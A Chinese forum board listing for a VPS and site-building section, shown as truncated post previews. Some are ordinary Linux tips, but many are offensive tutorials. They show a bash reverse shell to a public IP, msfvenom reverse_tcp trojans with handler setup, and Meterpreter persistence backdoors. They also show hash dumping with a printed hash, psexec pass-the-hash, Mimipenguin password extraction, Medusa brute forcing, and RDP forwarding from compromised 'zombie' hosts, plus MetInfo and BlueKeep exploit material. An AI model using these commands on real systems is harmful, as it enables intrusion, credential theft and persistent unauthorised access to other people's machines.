建站VPS工具综合杂谈
网站建设、网络程序源码、IPS Invision Community、Xenforo、WordPress等其它源码系统程序交流,包括VPS推荐、服务器建站技术讨论等话题。
364个主题在此版面
-
首先做一次简单的分析,本次CTF共两关,第一关为图片隐藏,第二关为https的暴力破解。总奖金池金额为166元,摄影小狂人贝贝获得第一名,JUST RUN获得第二名。首先恭喜两位了! 首先来看看战绩吧 当然,小伙伴们都顺利拿到了奖金。其余小伙伴瓜分的奖金! 奖金公布 CTF writeup访问:http://106.13.39.165:66/ 开局一张图 本题考查的是图片隐写 解题方法参考摄影狂人小贝贝的方法(因为太懒,我没写 ) CTF解题思路
-
- 0 篇回复
- 13 次查看
-
-
下面就先详细讲解下LXC转发工具与使用方法: lcx.exe是个端口转发工具,相当于把肉鸡A上的3389端口转发到B机上, 当然这个B机必须有外网IP.这样链接B机的3389度端口就相当于链接A机的3389. 用法: 如在本机B上监听 -listen 51 3389,在肉鸡A上运行-slave 本机ip 51 肉鸡ip 3389 那么在本地连127.0.0.1就可以连肉鸡的3389.第二条是本机转向。 例:现在有一个ip为222.221.221.22的websehll.用端口扫描发现开放了3389端口 可是我们输入外网IP可是不能正常链接。那么很有可能就是内网服务器。我们dos执行ipconfig可以看到。 这样的就是内网服务器了。 上传lcx.exe到肉鸡 然后 cx.exe -listen 51 3389 意思是监听51端口并转发到3389端口。 显示如下[+] Listening port 51 …… [+] Listen OK! [+] Listening port 3389 …… [+] Listen OK! [+] Waiting for Client on port:51 …… 然后在肉鸡上运行 lcx.exe -slave 你的IP 51 222.221.221.22 3389 222.221.221.22是我举例用的肉鸡IP.换成你的..运行以后本机监听端口。 显示如下信息 [+] Listening port 51 …… [+] Listen OK! [+] Listening port 3389 ……
-
- 0 篇回复
- 16 次查看
-
-
压缩、解压缩及归档工具file-roller compress/uncompress: .Z gzip/gunzip: .gz bzip2/bunzip2: .bz2 xz/unxz: .xz zip/unzip tar cpio compress/uncompress compress [-dfvcVr] [-b maxbits] [file ...] -d: 解压缩,相当于uncompress -c: 结果输出至标准输出,不删除原文件 -v: 显示详情 uncompress 解压缩 zcat file.Z >file gzip/gunzipgzip [OPTION]... FILE ... -d: 解压缩,相当于gunzip -c: 将压缩或解压缩的结果输出至标准输出 -#:1-9,指定压缩比,值越大压缩比越大 zcat:不显式解压缩的前提下查看文本文件内容 实例:gzip -c messages >messages.gz gzip -c -d messages.gz > messages zcat messages.gz > messagesbzip2/bunzip2/bzcatbzip2 [OPTION]... FILE ... -k: keep, 保留原文件 -d:解压缩 -#:1-9,压缩比,默认为9bzcat:不显式解压缩的前提下查看文本文件内容 xz/unxz/xzcatxz [OPTION]... FILE ... -…
-
- 0 篇回复
- 26 次查看
-
-
请注意,本文编写于 1055 天前,最后修改于 1055 天前,其中某些信息可能已经过时。 在日常工作中,我们需要得到目标系统的shell。在局域网相对简单,而不在同一局域网或者是异地网络。那么如何让目标直接互通执行相关shell命令呢?通过本文我们一起来看看Linux如何反弹shell。 实验环境kali Linux (内外:192.168.5.139) Centos8 (腾讯云:123.6.44.67) 姿势一 bash反弹首先,使用nc在外网主机上监听端口: nc -lvp 9090注意:一定是外网设置执行,因为两个设备不在同一网段。外网不能直达内网,但内网可以到达外网。 然后,在kali/内网执行下面命令 bash -i >& /dev/tcp/123.6.44.67/9090 0>&1命令解读 inux shell下有三种标准的文件描述符,分别如下: 0 - stdin 代表标准输入,使用<或<< 1 - stdout 代表标准输出,使用>或>> 2 - stderr 代表标准错误输出,使用2>或2>> 还有就是>&这个符号的含义,最好的理解是这样的: 当>&后面接文件时,表示将标准输出和标准错误输出重定向至文件。 当>&后面接文件描述符时,表示将前面的文件描述符重定向至后面的文件描述符 理解了上面这些知识,下面来解释一下这一条反弹shell的命令, bash -i代表在本地打开一个交互式bash, /d…
-
- 0 篇回复
- 38 次查看
-
-
Mimipenguin beta-2.0A tool to dump the login password from the current linux desktop user. Adapted from the idea behind the popular Windows tool mimikatz. alt text DetailsThis version of Mimipenguin sacrifices features and coverage (as opposed to the beta-1.0 py and sh scripts) in favor of speed and efficiency. Beta 2.0 uses hardcoded offsets for known structures in memory along with PTRACE to reliably extract cleartext user passwords from linux desktop environments. 项目地址: 链接
-
- 0 篇回复
- 28 次查看
-
-
ZIPzip可能是目前使用得最多的文档压缩格式。它最大的优点就是在不同的操作系统平台,比如Linux, Windows以及Mac OS,上使用。缺点就是支持的压缩率不是很高,而tar.gz和tar.gz2在压缩率方面做得非常好。 可以使用下列的命令压缩一个目录: zip -r archive_name.zip directory_to_compress下面是如果解压一个zip文档: unzip archive_name.zipTARTar是在Linux中使用得非常广泛的文档打包格式。它的好处就是它只消耗非常少的CPU以及时间去打包文件,他仅仅只是一个打包工具,并不负责压缩。 下面是如何打包一个目录: tar -cvf archive_name.tar directory_to_compress如何解包: tar -xvf archive_name.tar.gz上面这个解包命令将会将文档解开在当前目录下面。当然,你也可以用这个命令来捏住解包的路径: tar -xvf archive_name.tar -C /tmp/extract_here/TAR.GZ它在压缩时不会占用太多CPU的,而且可以得到一个非常理想的压缩率。 使用下面这种格式去压缩一个目录: tar -zcvf archive_name.tar.gz directory_to_compress解压缩: tar -zxvf archive_name.tar.gz上面这个解包命令将会将文档解开在当前目录下面。 当然,你也可以用这个命令来捏住解包的路径: tar -zxvf ar…
-
- 0 篇回复
- 18 次查看
-
-
这几天论坛里面的小伙伴发了些linux下的一些命令,这里我做简单的归纳!在linux显示日历所用命令cal 使用: 显示2018年的日历 cal -y 2018 在linux显示天气预报所用命令wttr.in wttr.in是一个在线网站,根据ip地位将本地的天气预报已字符串的形式显示。 命令: curl wttr.inv
-
- 0 篇回复
- 15 次查看
-
-
linux删除文件夹命令 在用Linux的时分,有时分要删除一个文件夹,常常会提示次此文件非空,没法删除,这个时候,必需运用rm -rf命令。关于一些小白用户常常在运用Linux命令,会十分当心,以免搞出一些事情,下面小编将教细致教大家如何运用linux命令删除文件夹,需求的请珍藏。 linux删除文件夹命令 linux删除文件夹命令实例: rm -rf /var/log/httpd/access将会删除/var/log/httpd/access目录以及其下所有文件、文件夹 linux删除文件夹命令 linux删除文件命令实例: rm -f /var/log/httpd/access.log将会强制删除/var/log/httpd/access.log这个文件 -r 是向下递归,不管有多少级目录,一并删除 -f 是直接强行删除,不作任何提示的意思 -i 进行交互式删除。 提示:运用rm命令要当心。由于一旦文件被删除,它是不能被恢复的。了避免这种状况的发作,能够运用i选项来逐一确认要删除的文件。假如用户输入y,文件将被删除。假如输入任何其他东西,文件则不会删除。 运用这个rm -rf删除文件的时分一定要格外当心,linux没有回收站的。
-
- 0 篇回复
- 25 次查看
-
-
一般来说,用户的登录方式有三种: (1)命令行登录(2)ssh登录(3)图形界面登录 <?php echo "hellow"; ?>对于运行级别为5的图形方式用户来说,他们的登录是通过一个图形化的登录界面。登录成功后可以直接进入 KDE、Gnome 等窗口管理器。 而本文主要讲的还是文本方式登录的情况:当我们看到mingetty的登录界面时,我们就可以输入用户名和密码来登录系统了。 Linux 的账号验证程序是 login,login 会接收 mingetty 传来的用户名作为用户名参数。 然后 login 会对用户名进行分析:如果用户名不是 root,且存在 /etc/nologin 文件,login 将输出 nologin 文件的内容,然后退出。 这通常用来系统维护时防止非root用户登录。只有/etc/securetty中登记了的终端才允许 root 用户登录,如果不存在这个文件,则 root 用户可以在任何终端上登录。 /etc/usertty文件用于对用户作出附加访问限制,如果不存在这个文件,则没有其他限制。 点击下载 Default Primary Success Info Warning Danger图形模式与文字模式的切换方式Linux预设提供了六个命令窗口终端机让我们来登录。 默认我们登录的就是第一个窗口,也就是tty1,这个六个窗口分别为tty1,tty2 … tty6,你可以按下Ctrl + Alt + F1 ~ F6 来切换它们。 如果你安装了图形界面,默认情况下是进入图形界面的,此时你就可以按Ctrl…
-
- 0 篇回复
- 12 次查看
-
-
在工作和生活中为了安全考虑,通常会对一些重要文件进行加密备份或加密保存。在Linux中如何做到呢?本文将为你介绍在Linux中常见的加密文件的方法。 01利用 vim/vi 加密优点:加密后,如果不知道密码,就看不到明文,包括root用户也看不了; 缺点:很明显让别人知道加密了,容易让别人把加密的文件破坏掉,包括内容破坏和删除; Vim加密示例首先用vim新建文件 vim 大表哥.txt按i进到编辑模式,输入完内容后按ESC,然后输入:X(注意是大写的X),回车; 这时系统提示让你输入密码,2次 :wq保存后退出,现在这个文件已经加密了; 用cat或more查看文件内容,显示为乱码;用 vim/vi 重新编辑这个文件,会提示输入密码,如果输入的密码不正确,同样会显示为乱码! 同样,当我们用vim编辑文档时,会提示输入密码。输入正确的密码后,才能进行编辑文档。 那么,如何去掉对文件的加密呢,我们只需要输入:set key=回车,保存文件即可! 02利用gzexe加密gzexe是系统自带的加密程序,它不但加密,同时压缩文件。 优点:加密简单,方便。 缺点:不能自己设置密码,容易破解。 加密/解密gzexe 22.txt #加密 gzexe -d 22.txt #解密 用tar命令 对文件加密压缩和解压这个就很简单了,类似于Windows下的给压缩包添加密码一样。 加密tar -czf - filename | openssl des3 -salt -k passwd | dd of=filename.des3命令说明: 在 tar -cz…
-
- 0 篇回复
- 33 次查看
-
-
一般来说,用户的登录方式有三种: (1)命令行登录(2)ssh登录(3)图形界面登录对于运行级别为5的图形方式用户来说,他们的登录是通过一个图形化的登录界面。登录成功后可以直接进入 KDE、Gnome 等窗口管理器。 而本文主要讲的还是文本方式登录的情况:当我们看到mingetty的登录界面时,我们就可以输入用户名和密码来登录系统了。 Linux 的账号验证程序是 login,login 会接收 mingetty 传来的用户名作为用户名参数。 然后 login 会对用户名进行分析:如果用户名不是 root,且存在 /etc/nologin 文件,login 将输出 nologin 文件的内容,然后退出。 这通常用来系统维护时防止非root用户登录。只有/etc/securetty中登记了的终端才允许 root 用户登录,如果不存在这个文件,则 root 用户可以在任何终端上登录。 /etc/usertty文件用于对用户作出附加访问限制,如果不存在这个文件,则没有其他限制。
-
- 0 篇回复
- 10 次查看
-
-
说明:很多时候我们的VPS运行脚本或者重启某些软件的时候都需要用到定时功能,这时候就要用到Crontab定时软件了,这里简单的说下安装和使用方法。 安装一般我们使用的Centos或者Debian都自带Crontab定时软件,如果没有,那我们就需要安装了。 1、centos安装crontab yum install vixie-cron crontabs #安装Crontab chkconfig crond on #设置开机启动Crontab service crond start #启动Crontab2、debian安装crontab apt-get install cron #安装Crontab /etc/init.d/cron restart #重启Crontab使用1、基本命令 crontab -e #编辑定时任务 crontab -r #移除定时任务 crontab -l #查看定时任务2、使用命令 添加的命令必须以如下格式: /root/rats.sh #前5个*指时间,后面为命令前5个*分别表示:分钟:0-59 小时:1-23 日期:1-31 月份:1-12 星期:0-6(0表示周日) 还可以用一些特殊符号: *: 表示任何时刻 ,: 表示分割 -:表示一个段,如:1-5,就表示1到5点 /n : 表示每个n的单位执行一次,如:*/1, 就表示每隔1个小时执行一次命令。也可以写成1-23/1 3、定时任务设置举例 21 * #21:43 执行05 * #05:15 执行17 …
-
- 0 篇回复
- 19 次查看
-
-
说明:一般我们在编辑文件的时候,都喜欢用WinSCP等FTP软件进行编辑,这样确实方便不少,也有时候为了方便直接用vim编辑文件。不过有时候编辑带有中文文件的时候会出现乱码的情况,这样有点影响我们的操作,这里就说下解决方法。 方法1、编辑.vimrc文件 vim .vimrc加入以下代码: set fileencodings=utf-8,ucs-bom,gb18030,gbk,gb2312,cp936 set termencoding=utf-8 set encoding=utf-8保存并退出,当然也可以用WinSCP等FTP软件在root文件夹新建并编辑.vimrc文件。 2、执行生效 source .vimrc最后我们再使用vim编辑中文文件的时候就不会出现乱码情况了。
-
- 0 篇回复
- 14 次查看
-
-
介绍我有一台Ubuntu服务器,上面运行了若干应用。我希望某个应用崩溃或出问题的时候,系统后台自动把故障信息发到我的邮箱。这样,免去了我远程登录服务器,查看运行故障日志的烦恼。此处仅需要服务器能发送邮件即可,不需收取邮件。 Postfix是Linux平台上应用广泛的邮件系统。本文中将在Ubuntu平台上安装配置Postfix,实现发送邮件功能。 步骤一:安装Postfix首先更新软件包: sudo apt-get update然后安装Mailutils(Postfix在该包中): sudo apt-get install mailutils安装中首先会出现问题请你确认,选择Y Do you want to continue?[Y/n] 在确认配置页面,tab至ok,回车: 以下配置页面共5个选项,我们选择默认选项Internet Site: 下面的配置页面是输入系统邮件名字,保持默认: 步骤二:配置PostfixPostfix需要在配置中监听loopbackinterface,打开主Postfix配置文件: sudo vi /etc/postfix/main.cf将inet_interfaces = all更为inet_interfaces = loopback-only,保存退出。 重启Postfix: sudo service postfix restart步骤三:测试发送邮件echo "测试邮件正文" | mail -s "邮件标题" your_email_address 用你的邮箱地址代替your_email_addres…
-
- 0 篇回复
- 18 次查看
-
-
masscan和nmap一样,都是扫描界的扛把子。两者相比都有其优缺点,masscan号称“世界上最快的人”😘。能够在几分钟扫描整个子网段。但是精准度和nmap相比还是差了那么一点。当然扫描速度也是和硬件想联系!基本实例扫描段内单个端口 masscan 192.168.123.1/24 -p 80 扫描段内多个端口 masscan 192.168.123.1/24 -p 22,80,443 快速扫描 使用如上的的设置可以得到结果,但速度将是比较慢。正如已经讨论的那样,整体上masscan要快一点,所以让我们加快速度。 默认情况下,Masscan扫描速度为每秒100个数据包,这是相当慢的。为了增加这一点,只需提供该-rate选项并指定一个值。 扫描100个常见端口的B类子网,每秒100,000个数据包 masscan 192.168.123.1/16 --top-ports 100 -rate 100000结果保存 masscan 10.11.0.0/16 --top-ports 100 > results.txt除此之外,您还具有以下输出选项: -oX filename:输出到filename的XML。 -oG filename:输出到filename在的grepable格式。 -oJ filename:输出到filename在JSON格式。总结结语 masscan油一个独特的功能是,您可以轻松地暂停和恢复扫描。当您按ctrl+c文件被创建时,调用paused.conf该文件具有扫描的所有设置和进度。您可以继续扫描‐‐r…
-
- 0 篇回复
- 15 次查看
-
-
Medusa(美杜莎)是一个速度快,支持大规模并行,模块化的爆力破解工具。可以同时对多个主机,用户或密码执行强力测试。Medusa和hydra一样,同样属于在线密码破解工具。Medusa是支持AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NCP (NetWare),NNTP,PcAnywhere, POP3, PostgreSQL, rexec, RDP、rlogin, rsh, SMBNT,SMTP(AUTH/VRFY),SNMP, SSHv2, SVN, Telnet, VmAuthd, VNC、Generic Wrapper以及Web表单的密码爆破工具。语法mudusa -h Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]命令详解: -h: 目的主机IP -H: 文件(有多个目标时,可以将IP放到一个文件中) -u: 单个用户名 -U: 用户名字典文件 -p :单个密码 -P: 密码文件 -M: 模块 指定用户名的密码破解如果用户名和协议都是已知的,我们可以使用medusa来破解密码。 命令如下: medusa -h 192.168.50.1 -u priess -P /root/zi.txt -M ssh 账号和密码破解用户名和密码都未知,命令如下 medusa -h 192.168.50.1 -U user.txt -P pass.txt -M s…
-
- 0 篇回复
- 22 次查看
-
-
漏洞简介MetInfo是一套使用PHP和Mysql开发的内容管理系统。 MetInfo 6.0.0~6.1.0版本中的 old_thumb.class.php文件存在任意文件读取漏洞。攻击者可利用漏洞读取网站上的敏感文件。 漏洞影响MetInfo 6.0.0MetInfo 6.1.0 漏洞分析看到\MetInfo6\app\system\include\module\old_thumb.class.php <?php #MetInfo Enterprise Content Management System #Copyright (C) MetInfo Co.,Ltd (http://www.metinfo.cn). All rights reserved. defined('IN_MET') or exit('No permission'); load::sys_class('web'); class old_thumb extends web{ public function doshow(){ global $_M; $dir = str_replace('../', '', $_GET['dir']); if(strstr(str_replace($_M['url']['site'], '', $dir), 'http')){ header("Content-type: image/jpeg"); ob_start(); …
-
- 0 篇回复
- 18 次查看
-
-
关于msfconsolemsfconsole简称msf是一款常用的渗透测试工具,包含了常见的漏洞利用模块和生成各种木马。是出家旅行的必备神器,今天我们在一起来回顾下吧。 启动在终端执行 service postgresql start #启动postgresql 不启动也可以 msfconsole 常见的参数解读-p, –payload < payload> 指定需要使用的payload(攻击荷载)。也可以使用自定义payload,几乎是支持全平台的 -l, –list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all -n, –nopsled < length> 为payload预先指定一个NOP滑动长度 -f, –format < format> 指定输出格式 (使用 –help-formats 来获取msf支持的输出格式列表) -e, –encoder [encoder] 指定需要使用的encoder(编码器),指定需要使用的编码,如果既没用-e选项也没用-b选项,则输出raw payload -a, –arch < architecture> 指定payload的目标架构,例如x86 | x64 | x86_64 –platform < platform> 指定payload的目标平台 -s, –space < length> 设定有效攻击荷载的最大长度,就是文…
-
- 0 篇回复
- 12 次查看
-
-
一:利用msfconsole生成windows木马msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.5.209 LPORT=4444 -e x86/33 -f exe -o yue.exe参数说明: -p:指定生成的类型lhost:攻击者的ip地址lport:攻击者的端口-e:木马的编码方式-f:生成的文件格式-o:输出文件 二:利用msfconsole攻击配置参数: use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.232.129 set LPORT 4444 exploit 三:windows运行木马 成功得到反弹 具体攻击细节,我们将会在第二节演示!
-
- 0 篇回复
- 16 次查看
-
-
msfconsole篇启动msfconsole msf > use auxiliary/scanner/mysql/mysql_login msf auxiliary(mysql_login) > show options Module options (auxiliary/scanner/mysql/mysql_login): Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS false no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS …
-
- 0 篇回复
- 15 次查看
-
-
建立持续后门当我们成功获取shell后,再次建立链接显得特别麻烦,那么有什么方法可以解决此问题呢。在前期的教程中,我讲过讲msf的进程转移的其他软件的方法,今天来看看另外的一种方法。 执行命令 run persistence -U -A -i 10 - 8090 -r 192.168.232.194其中 192.168.232.194为kali的ip 我们可以看到,在 C:\WINDOWS\TEMP\IGlPDkq.vbs下生成了一个vbs脚本。并且在注册表中也加入了相应的值,如开机启动。 这样,当对方电脑关机或者重启,我们同样能得到反弹会话。 获取凭证hashdump模块(post)可以从SAM数据库中导出本地用户账号,credential_collector脚本(post/windows/gather/credentials)也可以从目标设备中收集令牌信息。 run post/windows/gather/hashdump 脚本和post模块都需要通过“run”命令执行,数据的输出格式为:用户名:SID:LM哈希:NTLM哈希:::。 运行程序我们还可以使用“execute”命令在目标系统中执行应用程序。这个命令的使用方法如下: execute -f<file> [Options]运行后它将执行file参数所指定的文件。可选参数如下: -H:创建一个隐藏进程 -a:传递给命令的参数 -i:跟进程进行交互 -m:从内存中执行 -t:使用当前伪造的线程令牌运行进程 -s:在给定会话中执行进程 创建一个新账号接下来,我们可以在…
-
- 0 篇回复
- 9 次查看
-
-
获取管理员hash获得shell后,执行命令 getsystem提高权限为管理员权限,接着执行命令 run post/windows/gather/hashdump获取hash Administrator:500:aad3b435b51404eeaad3b435b51404ee:bd75068c6729aacd2fe3497b43bb664e::: 权限维持执行命令 use exploit/windows/smb/psexec set payload windows/meterpreter/reverse_tcp set LHOST 192.168.232.129 set LPORT 443 set RHOST 192.168.232.204 set SMBUser Administrator show options Module options (exploit/windows/smb/psexec): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 192.168.232.204 yes The target address RPORT 445 yes The SMB service …
-
- 0 篇回复
- 17 次查看
-
-
MSFVENOM常规选项1. –p (- -payload-options)添加载荷payload。 载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以只有选对payload,再填写正确自己的IP,PORT就可以生成对应语言,对应平台的后门了!!! (- -payload-options 列出payload选项) 2. –l查看所有payload encoder nops。 3. –f (- -help-formats)输出文件格式。 (- -help-formats 列出所有文件格式) Executable formats: asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-net, psh-reflection, psh-cmd, vba, vba-exe, vba-psh, vbs, war Transform formats: , c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript 4. –e编码免杀。 5. –a (- -platfo…
-
- 0 篇回复
- 13 次查看
-
-
我们在生成各种shell的时候,都是通过MSFvenom的Payload生成的。需要配置各种参数。今天给大家介绍一下,如何在kali中更加简单的生成shell吧。 安装msfpcapt-get install msfpc生成windows下shellmsfpc windows选择我们的网络端口,这里我选本地局域网2 需要注意的是 默认的端口是443 http://https//niu.bbskali.cn/72f84ef50b8136cb1f21983a66e365ad-blogsy 只因太懒这时,我们的桌面会有两个文件,一个是shell程序,一个是msfconsole的rc文件。 在目标端运行shell后,我们只需要执行下面命令即可得到shell msfconsole -r xx.rc成功得到反弹 其他shell同样的方式,要想生成其他shell.我们只需要执行msfpc后跟linux apk php即可 优缺点优点:快捷 方便 适合懒人 缺点:功能没有MSFvenom强大。
-
- 0 篇回复
- 12 次查看
-
-
漏洞介绍2019年5月14日微软官方发布安全补丁,修复了Windows远程桌面服务的远程代码执行漏洞,该漏洞影响了某些旧版本的Windows系统。此漏洞是预身份验证且无需用户交互,这就意味着这个漏洞可以通过网络蠕虫的方式被利用。利用此漏洞的任何恶意软件都可能从被感染的计算机传播到其他易受攻击的计算机,其方式与2017年WannaCry恶意软件的传播方式类似。 从微软官方的消息一出,各大安全厂商都开始发布了漏洞预警,那段时间我也一直在找对应的POC,但要不就是不能利用的POC,要不就是利用以前漏洞写的POC,更有甚着点击attack后给你惊喜。 靶场环境漏洞环境,我当时就是虚拟机装了Windows7 SP1的系统, 001使用VM安装Windows7 SP1模拟受害机 Windows7 SP1下载链接(这里的靶机是使用清水表哥提供的win7sp1的系统):迅雷下载ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/ 云盘下载:Windows7 X64下载链接:链接: https://pan.baidu.com/s/1A_b2PCbzInKx3hMkUz1xUg 提取码: fiwx 002 msf配置 下载cve_2019_0708_bluekeep_rce.rb到msf的配置文件/usr/share/metasploit-framework/modules/exploits…
-
- 0 篇回复
- 28 次查看
-